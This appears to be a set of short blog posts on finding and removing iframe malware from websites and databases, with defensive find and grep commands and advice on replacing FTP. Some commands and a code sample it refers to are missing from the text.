Malware in database

I got a report these days about a site being flagged as forgery by Google Safebrowsing.  Usually these situations are easy to handle since most of the times there is a flaw of a php script that allow attackers to upload/modify different .php/.js/.css files. Doing a find or restoring the files fixes the problem.

This time I did not find any modified file..but still the sites were being reported to contain malware. Then I’ve checked in the database and seems there were some iframe entries to redirect  to some malware sites. Truncating and reimporting the affected tables solved the issue.

Question remains : is there any malware scanner for databases? What if instead of a iframe some hardcoded strings are set..most likely I would have missed those.

How to remove malware, iframe virus from your site

I guess many of you already have this issue regarding the iframe malware.

In my researches I found out that this isn’t the hosting Linux/Windows server fault. This issue is provoked by a Windows Virus that sniffs the internet connection for user names and passwords of ftp accounts. Then it silently download every (or only index/default) files from the remote ftp to the infected Windows PC and then adds the iframe or javascript code and in the end it uploads back the files. So..first of all when removing this virus from the remote servers check your computers. The virus is known as : Trojan.Script.Iframe.

After scanning your system carefully, consider to stop using FTP. Download WinSCP and stop storing your passwords locally. Then change your passwords.

To get the list of infected files I use either grep or find under any Shell prompt (you will need ssh access to the server):

or with find:

find $PWD ( -name “*.php” -o -name “*.html” -o -iname “*.htm” ) -exec grep -l “income” {} ;

Also you can check the timestamp of the files and if you see changes of index.html or any other file and you did not do that on purpose then it means you are infected. I`m using the -mtime paramter of find to check for infected files:

find . -mtime -2

Will search all files that were modified in the last 48 hours

Malware Removal
You can remove the malware by just deleting the code (sample above) on the affected files. If you need to cleanup hundred of infected files you can do the following:

Malware search and remove

Seems these things happen a lot these days. If you have a ssh account like root or an other valid user you can search an remove easier the infected code from your files.

First of all try to find a file that was infected and check the date of it with :

find . -mtime -2

Will search all files that were modified in the last 48 hours